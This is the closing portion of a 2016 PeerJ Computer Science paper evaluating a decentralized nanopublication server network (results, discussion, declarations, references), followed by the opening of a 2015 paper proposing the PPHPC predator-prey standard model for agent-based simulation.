response time was below 0.5 s, and it was always below 1.1 s. Not a single one of the 4,802 individual HTTP requests timed out, led to an error, or received a nanopublication that could not be successfully verified. Figure 8 shows the result of the second part of the evaluation. The nanopublication server was able to handle 113,178 requests in total (i.e., an average of 377 requests per second) with an average response time of 0.12 s. In contrast, the SPARQL endpoint answering the same kind of requests needed 100 times longer to process them (13 s on average), Kuhn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.78 22/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.78 ● ● unreliable connection normal connection 0 2000 4000 6000 8000 10000 number of failed attempts to download a nanopublication ●unreliable connection normal connection 0 100 200 300 400 500 600 time to download entire dataset in seconds Figure 9 The number of failures and required time when downloading the LIDDI dataset from the server network over a normal connection as well as a connection that has been artificially made unreli- able. consequently handled about 100 times fewer requests (1267), and started to hit the timeout of 60 s for some requests when more than 40 client accessed it in parallel. In the case of the nanopublication server, the majority of the requests were answered within less than 0.1 s for up to around 50 parallel clients, and this value remained below 0.17 s all the way up to 100 clients. As the round-trip network latency alone between Ireland and Zurich amounts to around 0.03 to 0.04 s, further improvements can be achieved for a denser network due to the reduced distance to the nearest server. For the third part of the evaluation, all forty retrieval attempts succeeded. After normalization of the downloaded datasets, they were all identical, also the ones that were downloaded through an input stream that was artificially made highly unreliable. Figure 9 shows the number of retrieval failures and the amount of time that was required for the retrieval. With the normal connection, the downloading of nanopublications from the network almost always succeeded on the first try. Of the 98,184 nanopublications that had to be downloaded (98,085 content nanopublications plus 99 nanopublication indexes), fewer than 10 such download attempts failed in 18 of the 20 test runs. In the remaining two runs, the connection happened to be temporarily unreliable for ‘‘natural’’ reasons, and the number of download failures rose to 181 and 9,458, respectively. This, however, had no effect on the success of the download in a timely manner. On average over the 20 test runs, the entire dataset was successfully downloaded in 235 s, with a maximum of 279 s. Unsurprisingly, the unreliable connection leads a much larger average number of failures and retries, but these failures have no effect on the final downloaded dataset, as we have seen above. On average, 2,486 download attempts failed and had to be retried in the unreliable setting. In particular because half of these failures included a delay of 5 s, the download times are more than doubled, but still in a very reasonable range with an average of 517 s and a maximum below 10 min. In summary, the first part of the evaluation shows that the overall replication capacity of the current server network is around 9.4 million new nanopublications per day or 3.4 billion per year. The results of the second part show that the load on a server when measured as response times is barely noticeable for up to 50 parallel clients, and therefore Kuhn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.78 23/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.78 the network can easily handle 50·x parallel client connections or more, where x is the number of independent physical servers in the network (currently x =10). The second part thereby also shows that the restriction of avoiding parallel outgoing connections for the replication between servers is actually a very conservative measure that could be relaxed, if needed, to allow for a higher replication capacity. The third part of the evaluation shows that the client-side retrieval of entire datasets is indeed efficient and reliable, even if the used internet connection or some servers in the network are highly unreliable. DISCUSSION AND CONCLUSION We have presented here a low-level infrastructure for data sharing, which is just one piece of a bigger ecosystem to be established. The implementation of components that rely on this low-level data sharing infrastructure is ongoing and future work. This includes the development of ‘‘core services’’ (see ‘Architecture’) on top of the server network to allow people to find nanopublications and ‘‘advanced services’’ to query and analyze the content of nanopublications. In addition, we need to establish standards and best practices of how to use existing ontologies (and to define new ones where necessary) to describe properties and relations of nanopublications, such as referring to earlier versions, marking nanopublications as retracted, and reviewing of nanopublications. Apart from that, we also have to scale up the current small network. As our protocol only allows for simple key-based lookup, the time complexity for all types of requests is sublinear and therefore scales up well. The main limiting factor is disk space, which is relatively cheap and easy to add. Still, the servers will have to specialize even more, i.e., replicate only a part of all nanopublications, in order to handle really large amounts of data. In addition to the current surface feature definitions via URI and hash patterns, a number of additional ways of specializing are possible in the future: servers can restrict themselves to particular types of nanopublications, e.g., to specific topics or authors, and communicate this to the network in a similar way as they do it now with URI and hash patterns; inspired by the Bitcoin system, certain servers could only accept nanopublications whose hash starts with a given number of zero bits, which makes it costly to publish; and some servers could be specialized to new nanopublications, providing fast access but only for a restricted time, while others could take care of archiving old nanopublications, possibly on tape and with considerable delays between request and delivery. Lastly, there could also emerge interesting synergies with novel approaches to internet networking, such as Content-Centric Networking (Jacobson et al., 2012), with which—consistent with our proposal—requests are based on content rather than hosts. We argue that data publishing and archiving can and should be done in a decentralized manner. We believe that the presented server network can serve as a solid basis for semantic publishing, and possibly also for the Semantic Web in general. It could contribute to improve the availability and reproducibility of scientific results and put a reliable and trustworthy layer underneath the Semantic Web. Kuhn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.78 24/29 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.78 ADDITIONAL INFORMATION AND DECLARATIONS Funding Ruben Verborgh is a postdoctoral fellow of the Research Foundation–Flanders (FWO). The other authors received no particular funding for this work. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Research Foundation–Flanders (FWO). Competing Interests Christine Chichester is an employee of Nestle Institute of Health Sciences, Lausanne, Switzerland. George Giannakopoulos is an employee of SciFY, a private not-profit company, Athens, Greece. Author Contributions • Tobias Kuhn conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Christine Chichester conceived and designed the experiments, reviewed drafts of the paper. • Michael Krauthammer, Núria Queralt-Rosinach, George Giannakopoulos and Axel- Cyrille Ngonga Ngomo performed the experiments, reviewed drafts of the paper. • Ruben Verborgh and Raffaele Viglianti performed the experiments, wrote the paper, reviewed drafts of the paper. • Michel Dumontier conceived and designed the experiments, performed the experiments, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: Source code: - Java Library for Nanopublications: https://github.com/Nanopublication/nanopub-java - Nanopublication server: https://github.com/tkuhn/nanopub-server - Nanopublication monitor: https://github.com/tkuhn/nanopub-monitor Content Data: - All datasets: https://datahub.io/organization/nanopublications - https://datahub.io/dataset/disgenet-v3-0-0-0-nanopubs - https://datahub.io/dataset/nextprot-preliminary-nanopubs - https://datahub.io/dataset/openbel-1-0-nanopubs - https://datahub.io/dataset/openbel-20131211-nanopubs - https://datahub.io/dataset/generif-aida-nanopubs - https://datahub.io/dataset/linked-drug-drug-interactions-liddi Kuhn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.78 25/29 https://peerj.com https://github.com/Nanopublication/nanopub-java https://github.com/tkuhn/nanopub-server https://github.com/tkuhn/nanopub-monitor https://datahub.io/organization/nanopublications https://datahub.io/dataset/disgenet-v3-0-0-0-nanopubs https://datahub.io/dataset/nextprot-preliminary-nanopubs https://datahub.io/dataset/openbel-1-0-nanopubs https://datahub.io/dataset/openbel-20131211-nanopubs https://datahub.io/dataset/generif-aida-nanopubs https://datahub.io/dataset/linked-drug-drug-interactions-liddi http://dx.doi.org/10.7717/peerj-cs.78 - https://datahub.io/dataset/disgenet-v2-1-0-0-nanopubs Evaluation data: - Repo with data and scripts of conference paper: https://bitbucket.org/tkuhn/ trustypublishing-study/ - Repo with some additional content for this extended journal article: https: //bitbucket.org/tkuhn/trustypublishingx-study/. REFERENCES Banda JM, Kuhn T, Shah NH, Dumontier M. 2015. Provenance-centered dataset of drug-drug interactions. In: Proceedings of the 14th international semantic web conference (ISWC 2015). Berlin Heidelberg: Springer, 293–300. Belhajjame K, Corcho O, Garijo D, Zhao J, Missier P, Newman D, Palma R, Bechhofer S, Garcıa Cuesta E, Gómez-Pérez JM, Kyle G, Page K, Roos M, Ruiz JE, Soiland- Reyes S, Verdes-Montenegro L, De Roure D, Goble CA. 2012. Workflow-centric research objects: first class citizens in scholarly discourse. In: Proceedings of SePublica 2012. CEUR-WS. Berners-Lee T. 2006. Linked data—design issues. Available at http://www.w3.org/ DesignIssues/LinkedData.html. Bradley J. 2005. Documents and data: modelling materials for humanities research in XML and relational databases. Literary and Linguistic Computing 20(1):133–151 DOI 10.1093/llc/fqh048. Buil-Aranda C, Hogan A, Umbrich J, Vandenbussche PY. 2013. SPARQL web- querying infrastructure: ready for action? In: The Semantic Web–ISWC 2013. Berlin Heidelberg: Springer, 277–293. Carroll J, Bizer C, Hayes P, Stickler P. 2005. Named graphs, provenance and trust. In: Proceedings of WWW’05. New York: ACM, 613–622. Chichester C, Gaudet P, Karch O, Groth P, Lane L, Bairoch A, Mons B, Loizou A. 2014. Querying neXtProt nanopublications and their value for insights on sequence variants and tissue expression. Web Semantics: Science, Services and Agents on the World Wide Web 29:3–11. Chichester C, Karch O, Gaudet P, Lane L, Mons B, Bairoch A. 2015. Converting neXtProt into linked data and nanopublications. Semantic Web 6(2):147–153. Clarke I, Sandberg O, Wiley B, Hong TW. 2001. Freenet: a distributed anonymous in- formation storage and retrieval system. In: Designing Privacy Enhancing Technologies. Berlin Heidelberg: Springer, 46–66. Cohen JP, Lo HZ. 2014. Academic torrents: a community-maintained distributed repository. In: Proceedings of XSEDE ’14. New York: ACM, 2. Feigenbaum L, Williams GT, Clark KG, Torres E. 2013. SPARQL 1.1 Protocol recom- mendation W3C. Available at http://www.w3.org/TR/sparql11-protocol/ . Filali I, Bongiovanni F, Huet F, Baude F. 2011. A survey of structured P2P systems for RDF data storage and retrieval. In: Transactions on large-scale data- and knowledge- centered systems III. Berlin Heidelberg: Springer, 20–55. Kuhn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.78 26/29 https://peerj.com https://datahub.io/dataset/disgenet-v2-1-0-0-nanopubs https://bitbucket.org/tkuhn/trustypublishing-study/ https://bitbucket.org/tkuhn/trustypublishing-study/ https://bitbucket.org/tkuhn/trustypublishingx-study/ https://bitbucket.org/tkuhn/trustypublishingx-study/ http://www.w3.org/DesignIssues/LinkedData.html http://www.w3.org/DesignIssues/LinkedData.html http://dx.doi.org/10.1093/llc/fqh048 http://www.w3.org/TR/sparql11-protocol/ http://dx.doi.org/10.7717/peerj-cs.78 Freedman R. 2014. The Renaissance chanson goes digital: digitalduchemin. org. Early Music 42(4):567–578 DOI 10.1093/em/cau108. Fu K, Kaashoek MF, Mazières D. 2002. Fast and secure distributed read-only file system. ACM Transactions on Computer Systems 20(1):1–24 DOI 10.1145/505452.505453. Golden P, Shaw R. 2016. Nanopublication beyond the sciences: the PeriodO period gazetteer. PeerJ Computer Science 2:e44 DOI 10.7717/peerj-cs.44. Gray AJ, Baran J, Marshall MS, Dumontier M. 2015. Dataset descriptions: HCLS community profile. Interest group note, W3C (May 2015). Available at http://www. w3.org/TR/hcls-dataset. Groth P, Gibson A, Velterop J. 2010. The anatomy of a nano-publication. Information Services and Use 30(1):51–56. Han L, Finin T, Parr C, Sachs J, Joshi A. 2008. RDF123: from Spreadsheets to RDF. In: Proceedings of the 7th international conference on the semantic web. Berlin Heidelberg: Springer, 451–466. Harris S, Seaborne A. 2013. SPARQL 1.1 query language Recommendation W3C. Available at http://www.w3.org/TR/sparql11-query/ . Hartig O. 2013. An overview on execution strategies for linked data queries. Datenbank- Spektrum 13(2):89–99 DOI 10.1007/s13222-013-0122-1. Jacobson V, Smetters DK, Thornton JD, Plass M, Briggs N, Braynard R. 2012. Network- ing Named Content. Communications of the ACM 55(1):117–124. Kuhn T. 2014. A Survey and Classification of Controlled Natural Languages. Computa- tional Linguistics 40(1):121–170 DOI 10.1162/COLI_a_00168. Kuhn T. 2015a. nanopub-java: a Java library for nanopublications. In: Proceedings of the 5th workshop on linked science (LISC 2015). Kuhn T. 2015b. Science bots: a model for the future of scientific computation? In: WWW 2015 companion proceedings. New York: ACM, 1061–1062. Kuhn T, Barbano PE, Nagy ML, Krauthammer M. 2013. Broadening the scope of nanopublications. In: Proceedings of ESWC 2013. Berlin Heidelberg: Springer, 487–501. Kuhn T, Chichester C, Krauthammer M, Dumontier M. 2015. Publishing without publishers: a decentralized approach to dissemination, retrieval, and archiving of data. In: Proceedings of the 14th international semantic web conference (ISWC 2015), Lecture notes in computer science. Berlin Heidelberg: Springer. Kuhn T, Dumontier M. 2014. Trusty URIs: verifiable, immutable, and permanent digital artifacts for linked data. In: Proceedings of ESWC 2014. Berlin Heidelberg: Springer, 395–410. Kuhn T, Dumontier M. 2015. Making digital artifacts on the web verifiable and reliable. IEEE Transactions on Knowledge and Data Engineering 27(9):2390–2400. Kuhn T, Royer L, Fuchs NE, Schroeder M. 2006. Improving text mining with controlled natural language: a case study for protein interations. In: Proceedings DILS’06. Berlin Heidelberg: Springer. Ladwig G, Harth A. 2011. CumulusRDF: linked data management on nested key-value stores. In: Proceedings of SSWS 2011. Kuhn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.78 27/29 https://peerj.com http://dx.doi.org/10.1093/em/cau108 http://dx.doi.org/10.1145/505452.505453 http://dx.doi.org/10.7717/peerj-cs.44 http://www.w3.org/TR/hcls-dataset http://www.w3.org/TR/hcls-dataset http://www.w3.org/TR/sparql11-query/ http://dx.doi.org/10.1007/s13222-013-0122-1 http://dx.doi.org/10.1162/COLI_a_00168 http://dx.doi.org/10.7717/peerj-cs.78 Markman C, Zavras C. 2014. BitTorrent and libraries: cooperative data publishing, man- agement and discovery. D-Lib Magazine 20(3) DOI 10.1045/march2014-markman. McCusker JP, Lebo T, Krauthammer M, McGuinness DL. 2013. Next generation cancer data discovery, access, and integration using prizms and nanopublications. In: Proceedings of DILS 2013. Berlin Heidelberg: Springer, 105–112. Miller A, Juels A, Shi E, Parno B, Katz J. 2014. Permacoin: repurposing Bitcoin work for data preservation. In: Proceedings of the IEEE symposium on security and privacy (SP). Piscataway: IEEE, 475–490. Mons B, Van Haagen H, Chichester C, Den Dunnen JT, Van Ommen G, Van Mulligen E, Singh B, Hooft R, Roos M, Hammond J, Kiesel B, Giardine B, Velterop J, Groth P, Schultes E. 2011. The value of data. Nature Genetics 43(4):281–283 DOI 10.1038/ng0411-281. NP Index RA7SuQ0e66. 2015. Linked drug-drug interactions (LIDDI). Nanopublication index. Available at http://np.inn.ac/RA7SuQ0e661LJdKpt5EOS2DKykf1ht9LFmN aZtFSDMrXg. NP Index RACy0I4f_w. 2015. Nanopubs converted from OpenBEL’s Small and Large Corpus 1.0. Nanopublication index. Available at http://np.inn.ac/RACy0I4f_ wr62Ol7BhnD5EkJU6Glf-wp0oPbDbyve7P6o. NP Index RAR5dwELYL. 2015. Nanopubs converted from OpenBEL’s Small and Large Corpus 20131211. Nanopublication index. Available at http://np.inn.ac/ RAR5dwELYLKGSfrOclnWhjOj-2nGZN_8BW1JjxwFZINHw. NP Index RAVEKRW0m6. 2015. Nanopubs extracted from DisGeNET v3.0.0.0. Nanopublication index. Available at http://np.inn.ac/RAVEKRW0m6Ly_ PjmhcxCZMR5fYIlzzqjOWt1CgcwD_77c. NP Index RAXFlG04YM. 2015. Nanopubs converted from neXtProt protein data (prelimi- nary). Nanopublication index. Available at http://np.inn.ac/RAXFlG04YMi1A5su7o F6emA8mSp6HwyS3mFTVYreDeZRg. NP Index RAXy332hxq. 2015. Nanopubs extracted from DisGeNET v2.1.0.0. Nanopubli- cation index. Available at http://np.inn.ac/RAXy332hxqHPKpmvPc-wqJA7kgWiWa- QA0DIpr29LIG0Q. NP Index RAY_lQruua. 2015. AIDA Nanopubs extracted from GeneRIF. Nanopublica- tion index. Available at http://np.inn.ac/RAY_lQruuagCYtAcKAPptkY7EpITwZeUil GHsWGm9ZWNI. Paskin N. 2005. Digital object identifiers for scientific data. Data Science Journal 4:12–20 DOI 10.2481/dsj.4.12. Patrinos GP, Cooper DN, Van Mulligen E, Gkantouna V, Tzimas G, Tatum Z, Schultes E, Roos M, Mons B. 2012. Microattribution and nanopublication as means to incentivize the placement of human genome variation data into the public domain. Human Mutation 33(11):1503–1512 DOI 10.1002/humu.22144. Proell S, Rauber A. 2014. A scalable framework for dynamic data citation of arbitrary structured data. In: 3rd international conference on data management technologies and applications (DATA2014). Kuhn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.78 28/29 https://peerj.com http://dx.doi.org/10.1045/march2014-markman http://dx.doi.org/10.1038/ng0411-281 http://np.inn.ac/RA7SuQ0e661LJdKpt5EOS2DKykf1ht9LFmNaZtFSDMrXg http://np.inn.ac/RA7SuQ0e661LJdKpt5EOS2DKykf1ht9LFmNaZtFSDMrXg http://np.inn.ac/RACy0I4f_wr62Ol7BhnD5EkJU6Glf-wp0oPbDbyve7P6o http://np.inn.ac/RACy0I4f_wr62Ol7BhnD5EkJU6Glf-wp0oPbDbyve7P6o http://np.inn.ac/RAR5dwELYLKGSfrOclnWhjOj-2nGZN_8BW1JjxwFZINHw http://np.inn.ac/RAR5dwELYLKGSfrOclnWhjOj-2nGZN_8BW1JjxwFZINHw http://np.inn.ac/RAVEKRW0m6Ly_PjmhcxCZMR5fYIlzzqjOWt1CgcwD_77c http://np.inn.ac/RAVEKRW0m6Ly_PjmhcxCZMR5fYIlzzqjOWt1CgcwD_77c http://np.inn.ac/RAXFlG04YMi1A5su7oF6emA8mSp6HwyS3mFTVYreDeZRg http://np.inn.ac/RAXFlG04YMi1A5su7oF6emA8mSp6HwyS3mFTVYreDeZRg http://np.inn.ac/RAXy332hxqHPKpmvPc-wqJA7kgWiWa-QA0DIpr29LIG0Q http://np.inn.ac/RAXy332hxqHPKpmvPc-wqJA7kgWiWa-QA0DIpr29LIG0Q http://np.inn.ac/RAY_lQruuagCYtAcKAPptkY7EpITwZeUilGHsWGm9ZWNI http://np.inn.ac/RAY_lQruuagCYtAcKAPptkY7EpITwZeUilGHsWGm9ZWNI http://dx.doi.org/10.2481/dsj.4.12 http://dx.doi.org/10.1002/humu.22144 http://dx.doi.org/10.7717/peerj-cs.78 Queralt-Rosinach N, Kuhn T, Chichester C, Dumontier M, Sanz F, Furlong LI. 2016. Publishing DisGeNET as nanopublications. Semantic Web—Interoperability, Usability, Applicability 7(5):519–528. Sequeda JF, Arenas M, Miranker DP. 2012. On directly mapping relational databases to RDF and OWL. In: Proceedings of the 21st international conference on World Wide Web. ACM, 649–658. Speicher S, Arwe J, Malhotra A. 2015. Linked data platform 1.0. Recommendation W3C. Available at https://www.w3.org/TR/ldp/ . Verborgh R, Hartig O, De Meester B, Haesendonck G, De Vocht L, Vander Sande M, Cyganiak R, Colpaert P, Mannens E, Van de Walle R. 2014. Querying datasets on the web with high availability. In: Mika P, Tudorache T, Bernstein A, Welty C, Knoblock C, Vrandečić D, Groth P, Noy N, Janowicz K, Goble C, eds. Proceedings of the 13th international semantic web conference. Lecture notes in computer science, vol. 8796. Berlin Heidelberg: Springer, 180–196. Wilkinson MD, Dumontier M, Aalbersberg IJ, Appleton G, Axton M, Baak A, Blomberg N, Boiten JW, Da Silva Santos LB, Bourne PE, Bouwman J, Brookes AJ, Clark T, Crosas M, Dillo I, Dumon O, Edmunds S, Evelo CT, Finkers R, Gonzalez- Beltran A, Gray AJ, Groth P, Goble C, Grethe JS, Heringa J, ’t Hoen PA, Hooft R, Kuhn T, Kok R, Kok J, Lusher SJ, Martone ME, Mons A, Packer AL, Persson B, Rocca-Serra P, Roos M, Van Schaik R, Sansone SA, Schultes E, Sengstag T, Slater T, Strawn G, Swertz MA, Thompson M, Van der Lei J, Van Mulligen E, Velterop J, Waagmeester A, Wittenburg P, Wolstencroft K, Zhao J, Monsa B. 2016. The FAIR guiding principles for scientific data management and stewardship. Scientific Data 3:160018 DOI 10.1038/sdata.2016.18. Williams AJ, Harland L, Groth P, Pettifer S, Chichester C, Willighagen EL, Evelo CT, Blomberg N, Ecker G, Goble C, Mons B. 2012. Open PHACTS: semantic interoperability for drug discovery. Drug Discovery Today 17(21):1188–1198 DOI 10.1016/j.drudis.2012.05.016. Kuhn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.78 29/29 https://peerj.com https://www.w3.org/TR/ldp/ http://dx.doi.org/10.1038/sdata.2016.18 http://dx.doi.org/10.1016/j.drudis.2012.05.016 http://dx.doi.org/10.7717/peerj-cs.78 work_tyhqgdkjnzax3gvmp2ffowkomi ---- Towards a standard model for research in agent-based modeling and simulation Submitted 3 August 2015 Accepted 5 November 2015 Published 25 November 2015 Corresponding author Nuno Fachada, nfachada@laseeb.org Academic editor Feng Gu Additional Information and Declarations can be found on page 24 DOI 10.7717/peerj-cs.36 Copyright 2015 Fachada et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Towards a standard model for research in agent-based modeling and simulation Nuno Fachada1, Vitor V. Lopes2, Rui C. Martins3 and Agostinho C. Rosa1 1 Institute for Systems and Robotics, LARSyS, Instituto Superior Técnico, Universidade de Lisboa, Lisboa, Portugal 2 Universidad de las Fuerzas Armadas-ESPE, Sangolquı́, Ecuador 3 Life and Health Sciences Research Institute, School of Health Sciences, University of Minho, Braga, Portugal ABSTRACT Agent-based modeling (ABM) is a bottom-up modeling approach, where each entity of the system being modeled is uniquely represented as an independent decision- making agent. ABMs are very sensitive to implementation details. Thus, it is very easy to inadvertently introduce changes which modify model dynamics. Such problems usually arise due to the lack of transparency in model descriptions, which constrains how models are assessed, implemented and replicated. In this paper, we present PPHPC, a model which aims to serve as a standard in agent based modeling research, namely, but not limited to, conceptual model specification, statistical analysis of simulation output, model comparison and parallelization studies. This paper focuses on the first two aspects (conceptual model specification and statistical analysis of simulation output), also providing a canonical implementation of PPHPC. The paper serves as a complete reference to the presented model, and can be used as a tutorial for simulation practitioners who wish to improve the way they communicate their ABMs. Subjects Agents and Multi-Agent Systems, Scientific Computing and Simulation, Theory and Formal Methods Keywords Agent-based modeling, Standard model, Statistical analysis of simulation output, ODD INTRODUCTION Agent-based modeling (ABM) is a bottom-up modeling approach, where each entity of the system being modeled is uniquely represented as an independent decision-making agent. When prompted to act, each agent analyzes its current situation (e.g., what resources are available, what other agents are in the neighborhood), and acts appropriately, based on a set of rules. These rules express knowledge or theories about the respective low-level components. The global behavior of the system is the result from the simple, self-organized local relationships between the agents (Fachada, 2008). As such, ABM is a useful tool in simulating and exploring systems that can be modeled in terms of interactions between individual entities, e.g., biological cell cultures, ants foraging for food or military units in a battlefield (Macal & North, 2008). In practice, ABM can be considered a variation of discrete-event simulation, since state changes occur at specific points in time (Law, 2015). How to cite this article Fachada et al. (2015), Towards a standard model for research in agent-based modeling and simulation. PeerJ Comput. Sci. 1:e36; DOI 10.7717/peerj-cs.36 mailto:nfachada@laseeb.org https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.36 http://dx.doi.org/10.7717/peerj-cs.36 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.36 Spatial agent-based models (SABMs) are a subset of ABMs in which a spatial topology defines how agents interact (Shook, Wang & Tang, 2013). For example, an agent may be limited to interact with agents located within a specific radius, or may only move to a near physical or geographical location (Macal & North, 2010). SABMs have been extensively used to study a range of phenomena in the biological and social sciences (Isaac, 2011; Shook, Wang & Tang, 2013). ABMs are very sensitive to implementation details: the impact that seemingly unimportant aspects such as data structures, algorithms, discrete time representation, floating point arithmetic or order of events can have on results is tremendous (Wilensky & Rand, 2007; Merlone, Sonnessa & Terna, 2008). As such, it is very easy to inadvertently introduce changes which will alter model dynamics. These type of issues usually derive from a lack of transparency in model descriptions, which constrains how models are assessed and implemented (Müller et al., 2014). Conceptual models should be well specified and adequately described in order to be properly implemented and replicated (Edmonds & Hales, 2003; Wilensky & Rand, 2007). The ODD protocol (Overview, Design concepts, Details) is currently one of the most widely used templates for making model descriptions more understandable and complete, providing a comprehensive checklist that covers virtually all the key features that can define a model (Grimm et al., 2010). It allows modelers to communicate their models using a natural language description within a prescriptive and hierarchical structure, aiding in model design and fostering in-depth model comprehension (Müller et al., 2014). It is the recommended approach for documenting models in the CoMSES Net Computational Model Library (Rollins et al., 2014). However, Müller et al. (2014) argue that no single model description standard can completely and throughly characterize a model by itself, suggesting that besides a structured natural language description such as ODD, the availability of a model’s source code should be part of a minimum standard for model communication. Furthermore, the ODD protocol does not deal with models from a results or simulation output perspective, which means that an additional section for statistical analysis of results is often required. In practice, however, the situation is very different. While many ABMs have been published and simulation output analysis is a widely discussed subject matter (Sargent, 1976; Kelton, 1997; Law, 2007; Nakayama, 2008; Law, 2015), comprehensive inquiries concerning the output of ABM simulations are hard to find in the scientific literature. In this paper, we present PPHPC (Predator-Prey for High-Performance Computing), a conceptual model which captures important characteristics of SABMs, such as agent movement and local agent interactions. It aims to serve as a standard in agent based modeling research, and was designed with several goals in mind: 1. Provide a basis for a tutorial on complete model specification and thorough simulation output analysis. 2. Investigate statistical comparison strategies for model replication (Fachada et al., 2015a). Fachada et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.36 2/27 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.36 3. Compare different implementations from a performance point of view, using different frameworks, programming languages, hardware and/or parallelization strategies, while maintaining statistical equivalence among implementations (Fachada et al., 2015b). 4. Test the influence of different pseudo-random number generators (PRNGs) on the statistical accuracy of simulation output. This paper aims to fulfill the first of these goals, and is organized as follows. First, in ‘Background,’ we review several paradigmatic ABMs, as well as model description and analysis. Next, the ‘Methodology’ section is divided into five subsections, in which we: (a) formalize the conceptual model using the ODD protocol; (b) describe the canonical PPHPC realization implemented with the NetLogo ABM toolkit (Wilensky, 1999); (c) discuss how to select output focal measures; (d) explain how to collect and prepare data for statistical analysis; and, (e) propose how to analyze focal measures from a statistical point-of-view. In ‘Results’, statistical analysis of output of the NetLogo implementation is performed. A discussion on how these results can be utilized in additional investigations is undertaken in ‘Discussion’. ‘Conclusions’ provides a global outline of what was accomplished in this paper. BACKGROUND Several ABMs have been used for the purpose of modeling tutorials and/or model analysis and replication. Probably, the most well known standard ABM is the “StupidModel,” which consists of a series of 16 pseudo-models of increasing complexity, ranging from simple moving agents to a full predator-prey-like model. It was developed by Railsback, Lytinen & Grimm (2005) as a teaching tool and template for real applications, as it includes a set of features commonly used in ABMs of real systems. It has been used to address a number of questions, including the comparison of ABM platforms (Railsback, Lytinen & Jackson, 2006; Lytinen & Railsback, 2012), model parallelization (Lysenko & D’Souza, 2008; Tang & Wang, 2009), analysis of toolkit feasibility (Standish, 2008) and/or creating models as compositions of micro-behaviors (Kahn, 2007). The “StupidModel” series has been criticized for having some atypical elements and ambiguities (Lytinen & Railsback, 2012), reasons which lead Isaac (2011) to propose a reformulation to address these and other issues. However, its multiple versions and user-interface/visualization goals limit the series appeal as a pure computational model for the goals described in the introduction. Other paradigmatic models which have been recurrently used, studied and replicated include Sugarscape (Epstein & Axtell, 1996; Axtell et al., 1996; Bigbee, Cioffi-Revilla & Luke, 2007; D’Souza, Lysenko & Rahmani, 2007; Lysenko & D’Souza, 2008), Heatbugs (Wilensky, 2004; Sallach & Mellarkod, 2005; Goldsby & Pancerella, 2013), Boids (Reynolds, 1987; Reynolds, 2006; Goldsby & Pancerella, 2013) and several interpretations of proto- typical predator-prey models (Smith, 1991; Hiebeler, 1994; Wilensky, 1997; Tatara et al., 2006; Ottino-Loffler, Rand & Wilensky, 2007; Ginovart, 2014). Nonetheless, there is a lack of formalization and in-depth statistical analysis of simulation output in most of these implementations, often leading to model assessment and replication difficulties (Edmonds Fachada et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.36 3/27 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.36 & Hales, 2003; Wilensky & Rand, 2007). This might not come as a surprise, as most models are not implemented with replication in mind. Many models are not adequately analyzed with respect to their output data, often due to improper design of simulation experiments. Consequently, authors of such models can be at risk of making incorrect inferences about the system being studied (Law, 2007). A number of papers and books have been published concerning the challenges, pitfalls and opportunities of using simulation models and adequately analyzing simulation output data. In one of the earliest articles on the subject, Sargent (1976) demonstrates how to obtain point estimates and confidence intervals for steady state means of simulation output data using a number of different methodologies. Later, Law (1983) presented a state-of-the-art survey on statistical analyses for simulation output data, addressing issues such as start-up bias and determination of estimator accuracy. This survey was updated several times over the years, e.g., Law (2007), where Law discusses the duration of transient periods before steady state settles, as well as the number of replications required for achieving a specific level of estimator confidence. In Kelton (1997), the author describes methods to help design the runs for simulation models and interpreting their output using statistical methods, also dealing with related problems such as model comparison, variance reduction or sensitivity estimation. A comprehensive exposition of these and other important topics of simulation research is presented in the several editions of “Simulation Modeling and Analysis” by Law and Kelton, and its latest edition (Law, 2015) is used as a starting point for the analysis described in ‘Methodology’ and conducted in ‘Results.’ METHODOLOGY Overview, design concepts and details of PPHPC Here we describe the PPHPC model using the ODD protocol (Grimm et al., 2010). Time-dependent state variables are represented with uppercase letters, while constant state variables and parameters are denoted by lowercase letters. The U(a,b) expression equates to a random integer within the closed interval [a,b] taken from the uniform distribution. Purpose The purpose of PPHPC is to serve as a standard model for studying and evaluating SABM implementation strategies. It is a realization of a predator-prey dynamic system, and captures important characteristics of SABMs, such as agent movement and local agent interactions. The model can be implemented using substantially different approaches that ensure statistically equivalent qualitative results. Implementations may differ in aspects such as the selected system architecture, choice of programming language and/or agent-based modeling framework, parallelization strategy, random number generator, and so forth. By comparing distinct PPHPC implementations, valuable insights can be obtained on the computational and algorithmical design of SABMs in general. Fachada et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.36 4/27 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.36 Table 1 Model state variables by entity. Where applicable, the s and w designations correspond to prey (sheep) and predator (wolf ) agent types, respectively. Entity State variable Symbol Range Type t s,w Energy E 1,2,... Horizontal position in grid X 0,1,...,xenv −1 Vertical position in grid Y 0,1,...,yenv −1 Energy gain from food gs, gw 0,1,... Energy loss per turn ls, lw 0,1,... Reproduction threshold rsT , r w T 1,2,... Agents Reproduction probability rsP , r w P 0,1,...,100 Horizontal position in grid x 0,1,...,xenv −1 Vertical position in grid y 0,1,...,yenv −1Grid cells Countdown C 0,1,...,cr Horizontal size xenv 1,2,... Vertical size yenv 